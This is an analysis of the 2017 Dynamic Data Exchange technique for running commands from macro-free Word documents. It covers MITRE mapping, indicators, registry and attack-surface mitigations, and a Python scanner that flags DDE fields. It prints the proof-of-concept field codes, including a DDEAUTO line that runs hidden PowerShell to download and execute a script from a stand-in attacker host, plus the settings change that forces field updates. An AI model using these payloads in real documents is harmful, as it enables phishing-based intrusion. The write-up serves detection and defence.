Full Report
Authors: Etienne Stalmans, Saif El-Sherei

What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?!

Windows provides several methods for transferring data between applications. One method is to use the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available.
Analysis Summary
# Tool/Technique: Dynamic Data Exchange (DDE) Protocol Exploitation in MS Word
## Overview
This technique abuses Microsoft Word's support for Dynamic Data Exchange (DDE) fields to get command execution from a plain `.docx` without VBA macros and without a memory-corruption bug. DDE is a legacy inter-application messaging mechanism: a `DDEAUTO` or `DDE` field names a DDE server application and a topic, and when Word updates the field it offers to start that application if it is not already running. Pointing the field at `cmd.exe` with a command line as the topic turns this into arbitrary execution, gated only by the user answering Yes to Word's generic "update the fields in this document" and "start the application" prompts when the document is opened.
## Technical Details
- Type: Technique
- Platform: Microsoft Windows (MS Word)
- Capabilities: Arbitrary operating system command execution from a document that carries no macro and raises no macro warning; the only user interaction is two generic field-update prompts. Bypasses controls that key on VBA macros.
- First Seen: The concept leveraging DDE was discussed previously in 2016 (Excel), but this specific exploitation path demonstrated in MS Word was publicly detailed on October 9, 2017.
## MITRE ATT&CK Mapping
- T1566.001 - Phishing: Spearphishing Attachment (the usual delivery of the weaponised document)
- T1204.002 - User Execution: Malicious File
- T1559.002 - Inter-Process Communication: Dynamic Data Exchange
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell (`cmd.exe /k`)
- T1059.001 - Command and Scripting Interpreter: PowerShell (second stage in the PoC)
- T1105 - Ingress Tool Transfer (`DownloadString` of the remote `.ps1`)
## Functionality
### Core Capabilities
- **Command Launch via Fields:** A `DDEAUTO` field (e.g. `{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"}`) names `cmd.exe` as the DDE server and the command line as the topic; Word starts the executable when it updates the field.
- **Execution Trigger:** `DDEAUTO` fields are updated when the document is opened. The victim sees two prompts: first whether to update fields that may refer to other files, then a message that the remote data is not accessible asking whether to start `c:\windows\system32\cmd.exe`. Answering Yes to both runs the command.
- **Initial Payload:** Demonstrated execution of `calc.exe` as proof of concept (PoC).
### Advanced Features
- **Macro Bypass:** The file is a plain `.docx`, so there is no macro, no "Enable Content" bar and nothing for macro-centric controls (VBA blocking, macro-scanning sandboxes) to act on; the only gates are Word's generic field prompts.
- **Remote Code Execution (RCE) Vector:** The PoC downloads and executes a PowerShell script from a remote server: `{ DDEAUTO c:\Windows\System32\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}`. `cmd.exe /k` keeps the console alive while PowerShell fetches the script, and `-W Hidden` hides the PowerShell window.
- **Alternative Field Usage:** The plain `{DDE "Executable" "Arguments"}` field works the same way but is not updated automatically on open. The authors force the update by adding `<w:updateFields w:val="true"/>` to `word/settings.xml` inside the `.docx` ZIP package, which makes Word ask to update fields as soon as the document is loaded.
## Indicators of Compromise
- File Hashes: Not provided in the context.
- File Names: Malicious `.docx` files designed to trigger the DDE execution.
- Registry Keys: Not specified as a primary component of the exploit delivery, though executed binaries (like PowerShell) will leave standard artifacts.
- Network Indicators: Example payload uses `http://evilserver.ninja/pp.ps1` (Defanged: `http://evilserver[.]ninja/pp.ps1`).
- Behavioral Indicators: `winword.exe` spawning `cmd.exe` or `powershell.exe` right after a non-macro Word document is opened, preceded by the user answering Yes to Word's "update the fields in this document" and "start the application" prompts (no "Enable Content" bar is involved, because no macro is present).
## Associated Threat Actors
- The technique was publicly demonstrated by SensePost researchers (Etienne Stalmans, Saif El-Sherei) in October 2017. Specific threat actor attribution is not provided, but this technique has since been adopted by various threat groups.
## Detection Methods
- **Signature-based detection:** A `.docx` is a ZIP package; field instructions live in `word/document.xml` (and in header, footer and footnote parts) as `<w:instrText>` runs between `<w:fldChar w:fldCharType="begin"/>` and `<w:fldChar w:fldCharType="end"/>`, or as the `w:instr` attribute of `<w:fldSimple>`. Flag any instruction whose first token is `DDEAUTO` or `DDE`. Expect evasion: Word freely splits one instruction over several `<w:instrText>` elements, so join the fragments before matching rather than grepping the raw XML for one string, and treat `<w:updateFields w:val="true"/>` in `word/settings.xml` next to any DDE field as a strong signal. Legacy `.doc` files store the same field in the binary WordDocument stream, not in XML, and need a separate scanner.
- **Behavioral detection:** Alert on `winword.exe` spawning `cmd.exe`, `powershell.exe` or any other unexpected child process shortly after a document is opened (Sysmon Event ID 1 or equivalent process-creation telemetry with the parent image `winword.exe`), followed in the PoC by outbound HTTP from `powershell.exe` for the remote `.ps1`.
- **YARA rules:** Write rules over the extracted `word/*.xml` parts (or the decompressed document) that match `DDEAUTO`/`DDE` inside `<w:instrText>` or `w:instr=`, not over the compressed `.docx` bytes, which never contain the plain string.
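The scanner below is an added example, not code from the SensePost post, and it serves both the field layout described under Functionality (the `DDEAUTO`/`DDE` instruction and the `w:updateFields` switch in `word/settings.xml`) and the signature-based detection above. It walks every XML part under `word/`, joins `<w:instrText>` fragments between `begin` and `end` field characters so a split instruction is matched whole, folds nested fields into their parent (nesting, e.g. with a `QUOTE` field, is a known way of hiding the executable name), and reports whether `settings.xml` forces a field update on open. `build_test_docx` is a constructed helper that writes a skeletal `.docx` for the scanner's own tests; it is sufficient input for the scanner but is not claimed to open in Word, and the field text it carries is the page's `calc.exe` PoC.

```python
"""Scan a .docx for DDE / DDEAUTO field instructions. Added example, not SensePost's code."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{" + W_NS + "}"
# Word field names are case-insensitive; the keyword is the first token of the instruction.
DDE_RE = re.compile(r"^\s*DDE(?:AUTO)?\b", re.IGNORECASE)


def extract_field_codes(part_xml: bytes) -> list:
    """Return every field instruction in one WordprocessingML part.

    A complex field is spread over several runs: <w:fldChar begin/>, one or more
    <w:instrText> fragments, <w:fldChar separate/>, the cached result, <w:fldChar end/>.
    Fragments are joined so splitting the instruction across runs does not hide it, and
    a nested field's text is folded into its parent so the parent is seen as one string.
    """
    root = ET.fromstring(part_xml)
    stack, fields = [], []
    for el in root.iter():                      # document order
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                code = "".join(stack.pop())
                fields.append(code.strip())
                if stack:
                    stack[-1].append(code)
        elif el.tag == W + "instrText" and stack:
            stack[-1].append(el.text or "")
        elif el.tag == W + "fldSimple":         # one-element field form
            fields.append((el.get(W + "instr") or "").strip())
    return fields


def scan_docx(docx_bytes: bytes) -> dict:
    """Flag DDE/DDEAUTO fields in every XML part under word/ (body, headers,
    footers, footnotes, ...) and report whether word/settings.xml forces a
    field update on open (<w:updateFields/>, which the plain DDE variant relies on)."""
    dde, force_update = [], False
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            data = z.read(name)
            dde.extend(c for c in extract_field_codes(data) if DDE_RE.search(c))
            if name == "word/settings.xml":
                uf = ET.fromstring(data).find(W + "updateFields")
                # w:val is optional and defaults to true for on/off settings
                force_update = uf is not None and uf.get(W + "val", "true").lower() in ("true", "1", "on")
    return {"dde_fields": dde, "force_update_fields": force_update}


def build_test_docx(field_code: str, force_update: bool = False) -> bytes:
    """Constructed input for the scanner: a skeletal .docx (enough for the
    scanner, not guaranteed to open in Word) whose only field is `field_code`,
    split over two runs the way Word itself commonly stores it."""
    half = len(field_code) // 2
    document = (
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        f'<w:r><w:instrText xml:space="preserve">{escape(field_code[:half])}</w:instrText></w:r>'
        f'<w:r><w:instrText xml:space="preserve">{escape(field_code[half:])}</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>cached result</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>'
    )
    settings = (f'<w:settings xmlns:w="{W_NS}">'
                + ('<w:updateFields w:val="true"/>' if force_update else '')
                + '</w:settings>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", document)
        z.writestr("word/settings.xml", settings)
    return buf.getvalue()


if __name__ == "__main__":
    # The page's calc.exe PoC, once as DDEAUTO and once as DDE with the forced update.
    print(scan_docx(build_test_docx(r'DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"')))
    print(scan_docx(build_test_docx(r'DDE c:\windows\system32\cmd.exe "/k calc.exe"', True)))
    print(scan_docx(build_test_docx("PAGE")))      # benign field: nothing flagged
```

To use it on real mail attachments, feed `scan_docx` the raw file bytes and alert on a non-empty `dde_fields` list; `force_update_fields` on its own is common in benign templates, so treat it as a corroborating signal rather than an indicator. The scanner deliberately matches only the first token of an instruction, which is what Word dispatches on; a DDE keyword buried later in a `QUOTE` or other nested field still surfaces because the nested text is folded into the parent string.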
## Mitigation Strategies
- **User Training:** Teach users that the "update the fields in this document" and "start the application" prompts are not harmless: a document from an untrusted source that asks to start `cmd.exe`, `powershell.exe` or any other program should be closed, even though no macro warning appeared.
- **Hardening Recommendations:** Disable DDE in Word rather than relying on the prompts. Microsoft's post-disclosure guidance (Security Advisory ADV170021) adds the `DWORD` value `AllowDDE` under `HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Word\Security`; `0` disables DDE entirely and can be deployed through Group Policy. Where that is not available, set `DontUpdateLinks` = 1 under `HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Word\Options` so fields are not updated automatically on open; a user can still press F9 to update fields by hand, so `AllowDDE` is the stronger control.
- **Application Control/Whitelisting:** Block Office applications from spawning child processes. The Windows Defender Attack Surface Reduction rule "Block all Office applications from creating child processes" (`D4F940AB-401B-4EFC-AADC-AD5F3C50688A`) does this directly; AppLocker, WDAC or EDR policies can achieve the same by denying `cmd.exe` and `powershell.exe` when the parent image is `winword.exe`.
## Related Tools/Techniques
- DDE Exploitation in MS Excel (mentioned by the authors as a prior success).
- OLE Actions exploitation in Office documents.
- Other macro-less execution vectors targeting Office applications, e.g. Follina (CVE-2022-30190), where a document's remote template loads HTML that invokes the `ms-msdt:` protocol handler to run code through the Microsoft Support Diagnostic Tool.